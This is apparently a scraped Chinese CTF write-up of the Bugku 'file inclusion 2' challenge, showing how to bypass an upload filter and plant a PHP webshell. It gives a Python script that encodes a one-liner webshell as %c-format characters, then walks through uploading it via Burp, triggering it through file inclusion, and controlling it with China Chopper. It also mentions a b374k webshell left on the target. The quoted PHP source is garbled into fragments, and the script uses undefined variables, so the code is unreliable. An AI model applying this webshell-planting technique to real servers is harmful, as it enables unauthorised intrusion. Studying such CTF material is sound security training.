Bugku 文件包含2 writeup 绕过过滤

Bugku 文件包含2 writeup 绕过过滤_第1张图片

首先附上网站源码http://123.206.31.85:49166/

index.php


=70)
        {
            echo "

NAIVE!!!

"; } else { include($file); } } ?>

upload.php



    
    
    
    UPLOAD

file:
请上传jpg gif png 格式的文件 文件大小不能超过100KiB
/i', '_', $content); file_put_contents('upload/'.$filename, $content); echo "file upload successful!Save in: " . "upload/" . $filename; }else{ echo "upload failed!"; } } else { echo "upload failed! allow only jpg,png,gif,jpep"; } } ?>

看到源码小伙伴已改知道该如何绕过加上漏洞利用了吧

我直接附上python3脚本

hah  = ""#这里还自己想要的一句话,最好是免杀的
weizhi='666.php'#设置文件名
print(len(hah))
k=""
for i in hah:
    k=k+"%c"
    j=j+str(ord(i))+','
j = j[:-1]
k=k+'\".\'\"\'.\",'
print(k+j+l)

接下来我们到cmd里运行

Bugku 文件包含2 writeup 绕过过滤_第2张图片

我们复制下来先存起来,接下来所怎么用

Bugku 文件包含2 writeup 绕过过滤_第3张图片

到upload.php随便传个图片用burp拦截下

Bugku 文件包含2 writeup 绕过过滤_第4张图片

随便传个图片扔到repeater里

Bugku 文件包含2 writeup 绕过过滤_第5张图片把红色内容换成我们刚才用脚本跑出来的这段,然后发出去,看黄色那个接下来我们包含下

Bugku 文件包含2 writeup 绕过过滤_第6张图片

什么都没跳,说明成功了

Bugku 文件包含2 writeup 绕过过滤_第7张图片

一句话已经种上去了,接下来上菜刀就行了。

Bugku 文件包含2 writeup 绕过过滤_第8张图片

有其他更骚的种马思路求交流学习:企ii鹅1065705433 Bugku 文件包含2 writeup 绕过过滤_第9张图片b374k留上面了有需要自己拿了玩哈

你可能感兴趣的:(Bugku 文件包含2 writeup 绕过过滤)